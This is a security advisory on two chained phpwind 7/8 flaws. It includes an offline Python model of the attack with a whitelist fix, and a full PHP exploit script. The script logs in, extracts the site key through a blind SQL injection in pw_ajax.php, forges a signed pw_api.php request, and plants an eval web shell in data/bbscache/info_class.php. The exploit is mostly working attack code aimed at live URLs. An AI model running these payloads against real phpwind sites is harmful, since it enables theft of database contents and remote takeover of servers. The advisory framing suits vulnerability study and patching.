phpwind: multiple remote code execution vulnerabilities
phpwind 7 and 8 contain input validation flaws that a remote attacker can chain to execute arbitrary PHP code.

The first issue is in pw_ajax.php: data passed in the fieldname parameter is not adequately filtered before it is used in a SQL query, so an attacker can inject arbitrary SQL and read any data in the database. The PoC below uses it as a boolean-blind injection to recover the site's API key (the db_siteownerid value stored in pw_config) one hexadecimal character at a time.

The second issue is in class_other.php: the $class[cid] value is not adequately filtered, which allows arbitrary code execution. The code path is only reachable through a pw_api.php request whose signature is computed with that key, so on its own the bug is not remotely exploitable; the SQL injection above supplies the key. In the PoC the injected cid value contains '.eval($_GET[c]).', which ends up in the cached file data/bbscache/info_class.php and from then on executes whatever is passed in that file's c parameter.
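The two steps described above, as an added example that is not phpwind's code and not the original PoC: an offline simulation in Python (the PoC is PHP, but the point here is the extraction algorithm and the signature, not the transport). Everything about the server is an assumption: the pw_ajax.php flaw is modelled as a handler that splices fieldname unescaped into the column position of a SELECT and leaks only whether the query returned a row, the signature check is modelled after the way the PoC builds sig, the pw_attachs table and the 32-character key are constructed for the demo, and the database is SQLite, so hex string literals are spelled X'...' instead of MySQL's 0x....

```python
"""Offline model of the phpwind chain: blind key extraction, then a forged
pw_api.php signature. All tables, the key and the handler are constructed
assumptions for the demo, not phpwind code."""
import hashlib
import sqlite3

CONSTRUCTED_KEY = "3f2a9c1e0b7d4e6a5c8f1b2d3e4a5c6d"   # constructed demo key, 32 hex chars
HEX_ALPHABET = "0123456789abcdef"                      # the alphabet the PoC walks


def make_db():
    """Constructed pw_config table (one row holds the key) plus a dummy pw_attachs."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pw_config (db_name TEXT, db_value TEXT)")
    db.executemany("INSERT INTO pw_config VALUES (?, ?)",
                   [("db_sitename", "demo board"),
                    ("db_siteownerid", CONSTRUCTED_KEY)])
    db.execute("CREATE TABLE pw_attachs (aid INTEGER, attachurl TEXT)")
    db.execute("INSERT INTO pw_attachs VALUES (1, 'demo.jpg')")
    return db


def vulnerable_handler(db, fieldname):
    """Assumed model of the pw_ajax.php flaw: fieldname is interpolated, not
    validated. Leaks one bit: whether the resulting query returned a row."""
    sql = f"SELECT {fieldname} FROM pw_attachs WHERE aid = 1"   # table/column assumed
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def hex_literal(s):
    """Quote-free string literal, the trick the PoC uses (0x...) to survive
    addslashes-style escaping. MySQL accepts 0x<hex>; SQLite needs X'<hex>'."""
    return "X'" + s.encode().hex() + "'"


def injected_fieldname(prefix):
    """The PoC's fieldname payload in SQLite spelling: the query yields a row
    iff the stored key starts with prefix. LIKE is case-insensitive in both
    MySQL and SQLite, so a lowercase hex alphabet is enough."""
    return ("db_value FROM pw_config WHERE db_name LIKE "
            + hex_literal("db_siteownerid")
            + " AND db_value LIKE " + hex_literal(prefix + "%") + " --")


def extract_key(oracle, length=32, alphabet=HEX_ALPHABET):
    """Boolean-blind extraction, one character per position. Unlike the PoC,
    a position with no matching character aborts instead of being skipped."""
    found = ""
    for pos in range(length):
        for ch in alphabet:
            if oracle(found + ch):
                found += ch
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return found


def sign(params, key):
    """Signature as the PoC reconstructs it: sort by parameter name, concatenate
    name=value& for every non-empty parameter except sig, then md5 with the key."""
    arg = "".join(f"{k}={v}&" for k, v in sorted(params.items()) if v and k != "sig")
    return hashlib.md5((arg + key).encode()).hexdigest()


def api_accepts(params, server_key):
    """Assumed server-side check: recompute the signature and compare."""
    return params.get("sig") == sign(params, server_key)


def hardened_handler(db, fieldname):
    """Fix for the first bug: only a fixed list of column names reaches the query."""
    allowed = {"attachurl"}   # assumed column list
    if fieldname not in allowed:
        raise ValueError("invalid fieldname")
    return db.execute(f"SELECT {fieldname} FROM pw_attachs WHERE aid = 1").fetchone() is not None


def run_chain():
    """Step 1: recover the key through the oracle. Step 2: sign a request that
    carries the PoC's cid payload (its effect on info_class.php is not modelled)."""
    db = make_db()
    key = extract_key(lambda prefix: vulnerable_handler(db, injected_fieldname(prefix)))
    forged = {"mode": "Other", "method": "threadscateGory", "type": "app",
              "params": 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}'}
    forged["sig"] = sign(forged, key)
    return key, api_accepts(forged, CONSTRUCTED_KEY)


if __name__ == "__main__":
    key, accepted = run_chain()
    print("extracted key:", key)
    print("forged pw_api.php call accepted:", accepted)
```

The oracle costs at most 16 requests per position, 512 for a 32-character key, which is why the PoC can afford a naive linear scan rather than a binary search. The hardened handler shows the only real fix for the first bug: a column name cannot be parameterised, so it has to be matched against a whitelist before it touches the query.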
Test code (PoC)
<?php
// PoC for the phpwind 7/8 chain: a blind SQL injection in pw_ajax.php recovers
// the site key, which then signs a pw_api.php request that injects PHP via $class[cid].
echo "
Info: PoC for phpwind remote command execution
Test: exploit.php user password http://www.blackxl.org/phpwind/
";
if ($argc < 4) {   // user, password and base URL are all required
    echo "\r\nMissing arguments\r\n";
    die();
}
$user  = $argv[1];
$pass  = $argv[2];
$pwurl = $argv[3];
$myheader = array(
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language: zh-cn,zh;q=0.5',
    'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'Referer: http://www.blackxl.org',
    'Connection: Keep-Alive',
    'Cache-Control: no-cache',
    'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
);
$cookie = "";
// Log in as an ordinary user and collect the session cookies from the response headers.
$str = curlsend("$pwurl/login.php?", "POST", 0, $myheader, "forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC", 1);
preg_match_all("/Set-Cookie:([^;]+)/is", $str, $array);
for ($i = 0; $i < count($array[1]); $i++) {
    $cookie = $cookie . ";" . $array[1][$i];
}
//echo $cookie;
// Login check. The POST body and the marker string searched for in the response
// were stripped from the page by HTML extraction and are not reconstructed here,
// so as written this check never fires.
$test = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, '', 1);
if (strpos($test, '')) {
    die('Wrong username/password or other parameter');
}
// Blind SQL injection through fieldname: the injected LIKE compares the stored
// db_siteownerid (0x64625f736974656f776e65726964) against a hex-encoded prefix
// followed by % (0x25); hex literals avoid quotes. A matching prefix changes the
// response, which is detected by looking for "pw_config" in it.
$shellcode = "action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";
$hash = "0123456789abcdef";   // the key is 32 hex characters
$cracked = "";
for ($i = 0; $i < 32; $i++) {
    for ($n = 0; $n < 16; $n++) {
        $tmp = str_replace("{offset}", bin2hex($cracked . $hash[$n]), $shellcode);
        $tmp = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, $tmp, 0);
        if (strpos($tmp, "pw_config")) {
            echo "Cracked offset " . ($i + 1) . " :" . $hash[$n] . "\r\n";
            $cracked = $cracked . $hash[$n];
            break;
        }
    }
}
echo "Cracked key :" . $cracked . "\r\n";
echo "Get shell :";
//another 0day
// Second bug: the cid value is injected through the serialized params of a
// pw_api.php call; sig is md5 of the sorted parameters plus the cracked key.
$arg = '';
$hack = array();
$hack['mode']   = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';
$hack['type']   = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}
$arg .= 'sig=' . md5($arg . $cracked);
echo file_get_contents("$pwurl/pw_api.php?" . $arg);
echo "OK\r\n";
// The injected code lands in the class cache file; verify by running echo through it.
$str = file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if (strpos($str, 'wooyun')) {
    echo "Got shell :" . "$pwurl/data/bbscache/info_class.php?c=phpinfo();";
    echo "\r\nOver!";
}

// Recursively strip slashes (magic_quotes style) from the request parameters.
function strips($param) {
    if (is_array($param)) {
        foreach ($param as $key => $value) {
            $param[$key] = strips($value);
        }
    } else {
        $param = stripslashes($param);
    }
    return $param;
}

// Send one request with the global session cookie; $header=1 returns the
// response headers together with the body.
function curlsend($url, $method = false, $ssl = 0, $myheader = array(), $data = '', $header = 0) {
    global $cookie;
    $ch = curl_init();
    $timeout = 0; // set to zero for no timeout
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, $method === "POST");
    curl_setopt($ch, CURLOPT_HTTPHEADER, $myheader);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    if ($data) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_HEADER, $header);
    if ($ssl) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    }
    $handles = curl_exec($ch);
    curl_close($ch);
    //echo $handles;
    return $handles;
}